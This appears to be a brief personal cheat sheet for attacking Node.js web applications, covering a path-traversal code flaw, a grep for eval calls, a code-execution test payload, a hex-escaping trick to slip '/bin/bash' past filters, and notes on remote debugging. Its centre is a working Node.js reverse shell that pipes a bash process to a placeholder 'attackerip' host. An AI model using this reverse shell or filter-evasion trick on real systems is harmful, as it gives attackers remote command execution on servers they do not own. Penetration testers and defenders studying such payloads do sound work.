Path Traversal
- https://koumudi-garikipati.medium.com/directory-traversal-in-express-js-55a8e852fb41 (Explains different types of sessions)
var options = helpers.defaults({ path: process.argv[2], //path name is taken from the user. ttl: process.argv[3] }); sessionPath: function (options, sessionId) { return path.join(options.path, sessionId + options.fileExtension);//this leads to path traversal vulnerability as the path given by user is directly appended. },
WTF JS
- https://github.com/denysdovhan/wtfjs
NodeJS Regex
grep -rnw "eval(" . --color
# Payloads
require('util').log('CODE_EXECUTION');
# Reverse Shell (May require escaping in Python script)
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attackerip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
# Escaping Filters
cmd = "//bin//bash" --> cmd = "\\\\x2fbin\\\\x2fbash"
NodeJS Server Side Code Debugging
Remote Debugging (with .vscode/launch.json on server)
Via standard remote access:
- Modify IP address in launch.json to point to remote server
- Attach to directory and start debugging Via CLI (port 9228):
docker-compose -f ~/chips/docker-compose.yml exec chips node --inspect=0.0.0.0:9228- The benefit of debugging via the cli is that we can now set breakpoints in individual libraries, load them in the interactive cli, and run individual methods without making changes to the web application and reloading every time.
Other Resources
- https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet